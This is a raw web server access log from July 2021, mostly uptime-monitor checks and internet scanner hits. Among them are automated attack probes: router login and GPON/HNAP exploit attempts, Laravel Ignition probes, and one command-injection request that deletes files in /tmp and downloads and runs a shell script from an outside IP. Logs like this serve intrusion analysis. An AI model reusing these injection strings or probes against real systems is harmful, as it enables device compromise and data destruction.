199.19.225.175 - - [04/Jul/2021:07:31:42 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Jul/2021:07:31:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.203.57.10 - - [04/Jul/2021:07:32:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
212.91.246.72 - - [04/Jul/2021:07:32:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:33:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:34:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:35:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:36:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.120.237 - - [04/Jul/2021:07:37:56 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [04/Jul/2021:07:37:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.209.242 - - [04/Jul/2021:07:38:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
128.14.141.34 - - [04/Jul/2021:07:38:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:07:38:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:39:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:40:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:41:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:42:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:43:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:44:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:45:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:46:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.65.247.96 - - [04/Jul/2021:07:47:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2021:07:47:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:48:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:49:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:50:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:51:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:52:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:53:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:54:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:55:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.40.4.126 - - [04/Jul/2021:07:56:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
158.51.126.242 - - [04/Jul/2021:07:56:49 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 405 341 "-" "Go-http-client/1.1"
158.51.126.242 - - [04/Jul/2021:07:56:51 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 405 341 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Jul/2021:07:56:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
158.51.126.242 - - [04/Jul/2021:07:56:58 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 405 341 "-" "Go-http-client/1.1"
201.137.249.12 - - [04/Jul/2021:07:57:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
138.68.17.204 - - [04/Jul/2021:07:57:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
138.68.17.204 - - [04/Jul/2021:07:57:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
212.91.246.72 - - [04/Jul/2021:07:57:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:58:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:59:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:00:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.202 - - [04/Jul/2021:08:01:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
209.141.45.210 - - [04/Jul/2021:08:01:46 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://176.123.9.117:35351/ttt.sh;sh+ttt.sh+jaws HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
209.141.45.210 - - [04/Jul/2021:08:01:56 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.2.13) Gecko/20101206"
212.91.246.72 - - [04/Jul/2021:08:01:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:02:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.17.204 - - [04/Jul/2021:08:03:12 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "python-requests/2.18.4"
212.91.246.72 - - [04/Jul/2021:08:03:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:04:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:05:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:06:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:07:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:08:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:09:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.17.204 - - [04/Jul/2021:08:10:41 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "python-requests/2.18.4"
212.91.246.72 - - [04/Jul/2021:08:10:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:11:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.40.4.126 - - [04/Jul/2021:08:12:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2021:08:12:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.17.204 - - [04/Jul/2021:08:13:03 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "python-requests/2.18.4"
185.40.4.126 - - [04/Jul/2021:08:13:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2021:08:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.17.204 - - [04/Jul/2021:08:14:44 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "python-requests/2.18.4"
212.91.246.72 - - [04/Jul/2021:08:14:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.17.204 - - [04/Jul/2021:08:15:22 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "python-requests/2.18.4"
212.91.246.72 - - [04/Jul/2021:08:15:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:16:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.17.204 - - [04/Jul/2021:08:17:08 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "python-requests/2.18.4"
212.91.246.72 - - [04/Jul/2021:08:17:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:18:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:19:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.17.204 - - [04/Jul/2021:08:20:15 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "python-requests/2.18.4"
181.199.86.79 - - [04/Jul/2021:08:20:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.40.4.126 - - [04/Jul/2021:08:20:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2021:08:20:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:21:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:22:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:23:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:24:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.217.221 - - [04/Jul/2021:08:25:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Jul/2021:08:25:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.217.221 - - [04/Jul/2021:08:26:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
186.33.112.114 - - [04/Jul/2021:08:26:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [04/Jul/2021:08:26:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.217.221 - - [04/Jul/2021:08:27:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.221 - - [04/Jul/2021:08:27:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Jul/2021:08:27:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.217.221 - - [04/Jul/2021:08:28:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.221 - - [04/Jul/2021:08:28:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.221 - - [04/Jul/2021:08:28:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Jul/2021:08:28:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [04/Jul/2021:08:29:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
192.241.217.221 - - [04/Jul/2021:08:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.221 - - [04/Jul/2021:08:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.217.221 - - [04/Jul/2021:08:29:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Jul/2021:08:29:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:30:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.19.225.175 - - [04/Jul/2021:08:31:04 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Jul/2021:08:31:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:32:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:33:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:34:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:35:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.19.224.201 - - [04/Jul/2021:08:36:19 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Jul/2021:08:36:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.0.33.14 - - [04/Jul/2021:08:37:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:08:37:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:38:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:39:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:40:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:41:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:42:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:43:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:44:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:45:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:46:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:47:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:48:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:49:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:50:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:51:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:52:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:53:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:54:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:55:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.209.127.187 - - [04/Jul/2021:08:56:42 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [04/Jul/2021:08:56:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.210 - - [04/Jul/2021:08:57:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:08:57:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:58:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:08:59:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:00:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:01:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.235.234.61 - - [04/Jul/2021:09:01:45 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [04/Jul/2021:09:02:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.120.237 - - [04/Jul/2021:09:03:23 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
186.33.99.7 - - [04/Jul/2021:09:03:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:09:03:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.219.11.151 - - [04/Jul/2021:09:04:51 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [04/Jul/2021:09:04:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:05:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:06:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:07:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:08:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.209.162 - - [04/Jul/2021:09:09:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:09:09:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:10:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.19.225.175 - - [04/Jul/2021:09:11:11 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
65.99.189.42 - - [04/Jul/2021:09:11:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
